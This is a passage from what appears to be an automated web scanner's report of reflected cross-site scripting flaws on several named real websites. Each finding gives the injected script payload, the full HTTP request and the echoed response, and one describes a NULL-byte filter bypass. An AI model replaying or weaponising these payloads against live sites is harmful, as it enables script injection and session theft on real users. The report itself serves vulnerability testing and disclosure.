4.121. http://boardreader.com/site/mntdiat_mai_aigi_7486781.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/site/mntdiat_mai_aigi_7486781.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e1ca"><script>alert(1)</script>c60cedb11b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/mntdiat_mai_aigi_7486781.html?3e1ca"><script>alert(1)</script>c60cedb11b4=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:13:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a href="http://boardreader.com/site/mntdiat_mai_aigi_7486781.html?3e1ca"><script>alert(1)</script>c60cedb11b4=1" title=".............. ...... ........ | Site Profile">
...[SNIP]...

4.122. http://consumershealthyliving.com/clinical-study.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://consumershealthyliving.com
Path:	/clinical-study.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15882"><a>3a9ae0f5291 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /clinical-study.html?15882"><a>3a9ae0f5291=1 HTTP/1.1
Host: consumershealthyliving.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:31:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: af0de5e19d0aeec9236a3a01ce912df8=n0799snp41r1h1s86rdk7kmg30; path=/
Last-Modified: Tue, 01 Feb 2011 15:31:26 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
<a href="http://consumershealthyliving.com/clinical-study.html?15882"><a>3a9ae0f5291=1&fontstyle=f-larger" title="Increase Font Size" class="large">
...[SNIP]...

4.123. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://dean.edwards.name
Path:	/weblog/2006/06/again/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %0082f2d<a>e2e94140c60 was submitted in the REST URL parameter 1. This input was echoed as 82f2d<a>e2e94140c60 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /weblog%0082f2d<a>e2e94140c60/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 01 Feb 2011 15:33:00 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1644
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards">
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a>e2e94140c60/">weblog%0082f2d<a>e2e94140c60</a>
...[SNIP]...

4.124. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dean.edwards.name
Path:	/weblog/2006/06/again/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b5fd5"><script>alert(1)</script>73be2182441 was submitted in the REST URL parameter 1. This input was echoed as b5fd5"><script>alert(1)</script>73be2182441 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /weblog%00b5fd5"><script>alert(1)</script>73be2182441/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 01 Feb 2011 15:32:59 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1790
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards">
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a href="/weblog%00b5fd5"><script>alert(1)</script>73be2182441/2006/">
...[SNIP]...

4.125. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://dean.edwards.name
Path:	/weblog/2006/06/again/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 269cf<a>57679d84bdc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /weblog/2006/06/again269cf<a>57679d84bdc/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 01 Feb 2011 15:33:37 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Tue, 01 Feb 2011 15:33:37 GMT
Last-Modified: Tue, 01 Feb 2011 15:33:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>
<title>dean.edwards.name/weblog/</title>
<meta name="author" content="Dean Edwards">
<link rel="stylesheet" href="http://deanedwards
...[SNIP]...
</a>/again269cf<a>57679d84bdc/</h1>
...[SNIP]...

4.126. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dean.edwards.name
Path:	/weblog/2006/06/again/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b483d"><script>alert(1)</script>e257170cefc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b483d\"><script>alert(1)</script>e257170cefc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weblog/2006/06/again/?b483d"><script>alert(1)</script>e257170cefc=1 HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:32:16 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=75>; rel=shortlink
Expires: Tue, 01 Feb 2011 15:32:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 213693

<!doctype html>
<html>
<head>
<title>Dean Edwards: window.onload (again)</title>
<meta name="author" content="Dean Edwards">
<link rel="stylesheet" href="http://d
...[SNIP]...
<form class="contact" action="/weblog/2006/06/again/?b483d\"><script>alert(1)</script>e257170cefc=1#preview" method="post">
...[SNIP]...

4.127. http://ds.addthis.com/red/psi/p.json [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 592e2<script>alert(1)</script>9fd54abbf1d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/p.json?callback=_ate.ad.hpr592e2<script>alert(1)</script>9fd54abbf1d HTTP/1.1
Host: ds.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 311
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 01 Feb 2011 15:32:28 GMT; Path=/
Set-Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; Domain=.addthis.com; Expires=Mon, 02 May 2011 15:32:28 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 03 Mar 2011 15:32:28 GMT; Path=/
Set-Cookie: di=%7B%7D..1296574348.19F|1296574348.19A; Domain=.addthis.com; Expires=Thu, 31-Jan-2013 04:49:40 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 01 Feb 2011 15:32:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 01 Feb 2011 15:32:28 GMT
Connection: close

_ate.ad.hpr592e2<script>alert(1)</script>9fd54abbf1d({"urls":["http://segment-pixel.invitemedia.com/pixel?pixelID=38582&partnerID=169&key=segment","http://segment-pixel.invitemedia.com/pixel?pixelID=15694&partnerID=169&key=segment"],"segments" : ["19F",
...[SNIP]...

4.128. http://ds.addthis.com/red/psi/sites/www.ehow.com/p.json [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www.ehow.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 1cee6<script>alert(1)</script>ded05b5064d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.ehow.com/p.json?callback=_ate.ad.hpr1cee6<script>alert(1)</script>ded05b5064d&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.ehow.com%2Fcomputer-software%2F&ref=http%3A%2F%2Fburp%2Fshow%2F4&o1jt6o HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296507257.60|1293848200.66; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 290
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 02 Feb 2011 15:32:00 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 04 Mar 2011 15:32:00 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296660720.60|1293848200.66; Domain=.addthis.com; Expires=Fri, 01-Feb-2013 11:36:19 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Wed, 02 Feb 2011 15:32:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 15:32:00 GMT
Connection: close

_ate.ad.hpr1cee6<script>alert(1)</script>ded05b5064d({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fwww.ehow.com%2fcomputer-software%2f"],"segments" : ["60"],"loc": "MjAwMD
...[SNIP]...

4.129. http://gocitykids.parentsconnect.com/data/service-calendar.json [jsoncallback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gocitykids.parentsconnect.com
Path:	/data/service-calendar.json

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload c49f0<script>alert(1)</script>f5a6d19584e was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /data/service-calendar.json?widget_query=true&zipcode=All&year=2009&month=10&day=12&max=4&widget_category_id=0&widget_category=All&jsoncallback=jsonp1255386312275c49f0<script>alert(1)</script>f5a6d19584e&_=1255386319932 HTTP/1.1
Host: gocitykids.parentsconnect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Language: en
Content-Type: text/json;charset=UTF-8
Content-Length: 20190
Date: Wed, 02 Feb 2011 19:21:09 GMT
Connection: close

jsonp1255386312275c49f0<script>alert(1)</script>f5a6d19584e(
[{"id":"211700","name":"Groundhog Day (PG)","attractionAlias":"the-colonial-theatre-227-bridge-street-phoenixville-pa-19460-3449-us","phone":"610.917.0223; 610.917.1228","url":"http://www.thecoloni
...[SNIP]...

4.130. http://it.toolbox.com/blogs/database-soup [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/database-soup

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9deb'-alert(1)-'530e4bffa2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/database-soup?e9deb'-alert(1)-'530e4bffa2c=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Database So
...[SNIP]...
aBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddatabase-soup%26e9deb'-alert(1)-'530e4bffa2c%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4.131. http://it.toolbox.com/blogs/database-talk [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/database-talk

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9726'-alert(1)-'362cf24ba31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/database-talk?e9726'-alert(1)-'362cf24ba31=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63475
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Database Ta
...[SNIP]...
aBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddatabase-talk%26e9726'-alert(1)-'362cf24ba31%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4.132. http://it.toolbox.com/blogs/db2luw [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/db2luw

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29327'-alert(1)-'14b42306d5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/db2luw?29327'-alert(1)-'14b42306d5d=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62990
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   An Expert's
...[SNIP]...
r != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddb2luw%2629327'-alert(1)-'14b42306d5d%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4.133. http://it.toolbox.com/blogs/db2zos [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/db2zos

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2553e'-alert(1)-'a0a7b564b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/db2zos?2553e'-alert(1)-'a0a7b564b7=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78368
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Getting the
...[SNIP]...
r != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddb2zos%262553e'-alert(1)-'a0a7b564b7%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4.134. http://it.toolbox.com/blogs/elsua [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/elsua

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3acb'-alert(1)-'93981464ca0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/elsua?f3acb'-alert(1)-'93981464ca0=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 64515
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   elsua: The
...[SNIP]...
er != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3delsua%26f3acb'-alert(1)-'93981464ca0%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4.135. http://it.toolbox.com/blogs/juice-analytics [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/juice-analytics

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79855'-alert(1)-'e9a3a93587c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/juice-analytics?79855'-alert(1)-'e9a3a93587c=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61934
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Juice Analy
...[SNIP]...
tnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3djuice-analytics%2679855'-alert(1)-'e9a3a93587c%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4.136. http://it.toolbox.com/blogs/minimalit [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/minimalit

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3719a'-alert(1)-'3be2065b10e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/minimalit?3719a'-alert(1)-'3be2065b10e=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60105
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Minimal IT:
...[SNIP]...
= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dminimalit%263719a'-alert(1)-'3be2065b10e%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4.137. http://it.toolbox.com/blogs/penguinista-databasiensis [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/penguinista-databasiensis

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f871'-alert(1)-'61cc9848b43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/penguinista-databasiensis?2f871'-alert(1)-'61cc9848b43=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46117
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Penguinista
...[SNIP]...

{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dpenguinista-databasiensis%262f871'-alert(1)-'61cc9848b43%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

